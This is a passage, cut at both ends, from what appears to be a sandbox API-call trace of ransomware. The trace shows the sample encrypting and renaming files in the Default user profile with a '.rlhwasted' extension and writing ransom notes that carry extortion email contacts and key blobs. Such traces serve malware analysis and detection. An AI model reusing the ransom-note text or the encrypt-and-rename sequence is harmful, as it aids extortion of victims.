Size=0xa34) returned 0x6fcd40 [0199.229] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0199.230] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.230] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.230] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.232] SetEndOfFile (hFile=0x108) returned 1 [0199.232] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.232] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.232] lstrcpyW (in: lpString1=0x713044, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.rlhwasted")) returned 1 [0199.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.234] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.234] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0199.234] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.234] CloseHandle (hObject=0x10c) returned 1 [0199.236] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.236] CloseHandle (hObject=0x128) returned 1 [0199.236] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.236] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0199.238] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.238] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.238] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0199.239] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.239] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.249] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.249] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lczEBrOdwg4/TxAtUy5k8T6GcsJlHpQPWFvTnRvnUekNW7+YwEbxhukJyXweJa85\r\n6QNuweXeP9BxpiL+LKaO8+0GkWWOiK8CGveB95MJTouPB8w8W5JPuw6UDgGqxd6e\r\nJIlWmArao942tF7nvRKzNf5T8/c4OEDyR1oHFhidT72qj3d7GE78W62KXi/AmOpY\r\nG8EXPwst1f3wl1QiU5E/fvcbqW6JR6pNvzqru7Ofl63r+chwMP8M+UYdYEL8XESI\r\nE98WbtLil2fpwLCFsfOptMG5IaW/enL4QgrEiDlZnQvUQ3iG1MWNO+80yOc2lir6\r\nmxk3uCjv8eF9EHUdrTfYcKFjQRN5LQgyktnBVtdJfY+/G7NSu836zX8c6bhE9uXc\r\nlQ1xvToevnRnppwx1FnmmI30jtrN5HY+9F4hiNpll2DoGd8HlzjTAJ9Y8v8N4BkK\r\n092WEotImfscNh00i2wTlWekX5cj4F/mik2eDoRFWtoeXPjoywp5NlzYd/hnWJXH\r\nAlmY49mKMhsLr0WwGg4W82RL1kqngrh2MjrWyJfYcsnibxZ+2vCapYj2bvuAHBwg\r\n/7m1szw0DJu/0+YRXfa00iHNacqua5QwaYByHkkWBQH7Lakuyj02NjOHePygjNNC\r\nGCCdVoWNlFi2vMOrLzPrr6V8J4knit60zv8j/MZ9Ryt=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.249] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.249] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.250] SetEndOfFile (hFile=0x108) returned 1 [0199.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.252] CloseHandle (hObject=0x108) returned 1 [0199.254] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.254] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706790 | out: hHeap=0x6b0000) returned 1 [0199.255] _aulldvrm () returned 0x0 [0199.255] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0199.256] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.256] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.256] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0199.256] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x712fd0 [0199.256] lstrcpyW (in: lpString1=0x713050, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.256] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.256] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0199.257] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.257] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.259] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.260] SetEndOfFile (hFile=0x108) returned 1 [0199.260] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.260] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.260] lstrcpyW (in: lpString1=0x713050, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.rlhwasted")) returned 1 [0199.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.264] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.264] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0199.264] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.264] CloseHandle (hObject=0x128) returned 1 [0199.266] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.267] CloseHandle (hObject=0x10c) returned 1 [0199.267] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.267] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0199.268] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.268] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.268] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0199.278] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.278] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.289] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.289] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aOvii9lBIejd1QmhmB8RNWM72nr8s/EsDEEc3lDzFY25XWAi3c/nEWMVrCok4p3X\r\nsFz9p5XI2Nf5fGcYY7fGkbnjFbkrpoE5Zq6Z6vHgGQKu8bcUH6gXVl27dnMhxELn\r\nE6amYQoxWMuZFFIkCp9l7ISerHRvka84ascllrOzrdOw3DvMCFQBhjU4RCcV7FH2\r\nKBIn724GomU/68nEhPxL4AL9cBTZ34BWwg8+OfQMZO6pNS44aonoyqMuo1eTBcjP\r\nDWbmFdMXz3Cmh9fAz1dJtxHynMK6TXW1QbqwehkEsEl58cf/+2/HJKGa50bu5qZq\r\nLTGGxx9/EetetOXNw/TGl4JQvtELEbXFVrnFuIN8LAhx3KbWSr6urI/Fee7ZYbM5\r\nsouZk5e1+nCAq7koVkiPVz/SLkFemrdwaXgM2PjGw6YCL8wIIXDb44vYOM2hbeAC\r\nTo6x9XQnFbwclXLdCG2g0mjg9nPxDthVAUnqBIvnDMl+/tl6UVo0XGMnqg1Xe6KK\r\nWBjggYeGLQQV0/eEuYtf7EfZI7S9/Ku6/MEJneakyPFzkIxCnGhH4CRhR82aKVzG\r\nUUIuuM8ExutdmCV0IwGttH9btmnp4hgouEbaMU/Kf2ur05V+/V2posEPqPPPH39f\r\nDtG2UDZoWm0LabFTimi2/Nde00hI401GCEpxH2vFVwz=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.289] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.289] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.289] SetEndOfFile (hFile=0x108) returned 1 [0199.292] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.292] CloseHandle (hObject=0x108) returned 1 [0199.294] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.294] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f25b0 | out: hHeap=0x6b0000) returned 1 [0199.294] _aulldvrm () returned 0x0 [0199.294] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0199.295] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.295] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.295] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0199.295] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x712fd0 [0199.295] lstrcpyW (in: lpString1=0x713058, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.295] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.296] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0199.296] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.297] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.297] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.299] SetEndOfFile (hFile=0x108) returned 1 [0199.299] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.299] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.299] lstrcpyW (in: lpString1=0x713058, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.rlhwasted")) returned 1 [0199.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.348] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.348] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0199.349] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.349] CloseHandle (hObject=0x10c) returned 1 [0199.349] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.349] CloseHandle (hObject=0x128) returned 1 [0199.349] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.350] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0199.351] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.351] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.351] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0199.352] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.352] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.482] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.482] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]USiofaOSdSrgR76v11AZTUg9wTZiTqF83J/1h12R69EFKkiVAc03A32ujMAkn2Ei\r\nft20VpAtpeEydFt+mJn0rTO0oHVrMrERvfOCse6t7lxvbsHdmrobPROBt3PRlZhJ\r\nx6GDiTx8NAKrwTqwjBBi/KRQiXQHnYagSHtMxtp0RJQGCbRPvItECqkihopUikUT\r\nQ3htsrcjEQ8pUcmDnkq6/RSnjr3W6Uo+W6CC/zcEQlRKMRq+psxTlnfecw/Qg4qk\r\n0zDfhQ+kHUAMszH5M9oopmsQJ/+yplcdqyk8Le9tUNS7EEz5L8uGapq5SKsj0U4y\r\nEMwQHa1Ht0XwRMJtYDeGeOlqBRoZ7Zs31T6fl85RFNAydxw5Qd8LGqHYj7gMIYH0\r\nYIq5DzQ35mSyig/7hTo++vOuQ/zUxTw7K2peRqX+wsyN2p83FW7bEA41TuvdQx6F\r\n3CBm0Hu0p90D1EZ+axKwZTmMfHA1Ev9YskwlD9ON6W5ty+yKVMMwMZB3ekzyiSxA\r\nrsebW0Ev7H3+hY9oCQ97SHz8ZAYMMJVEsJWHs2klVXnRfVyEpcC27WDiokSD7kPy\r\nPVp/4lX4U/0WQOjpbbU5Ra++cDdc7Vl6dNnxulkonaeyZ7NAx4XNinjB3ObncZAo\r\nKF3A5+shagGeIuD5CeDllK1MvuCi953m4fpxIq/27SD=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.482] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.482] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.482] SetEndOfFile (hFile=0x108) returned 1 [0199.485] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.485] CloseHandle (hObject=0x108) returned 1 [0199.485] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.485] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b810 | out: hHeap=0x6b0000) returned 1 [0199.485] _aulldvrm () returned 0x0 [0199.486] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0199.487] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.487] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.487] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0199.487] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x252) returned 0x6d4580 [0199.487] lstrcpyW (in: lpString1=0x6d45c8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.487] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.487] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0199.488] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.488] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.rlhwasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log1.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.489] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.491] SetEndOfFile (hFile=0x108) returned 1 [0199.491] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.491] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.491] lstrcpyW (in: lpString1=0x6d45c8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.rlhwasted")) returned 1 [0199.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.493] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0199.493] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x2e400 [0199.493] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e400) returned 0x12b0000 [0199.493] CloseHandle (hObject=0x10c) returned 1 [0199.559] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0199.561] CloseHandle (hObject=0x124) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.561] CryptAcquireContextW (in: 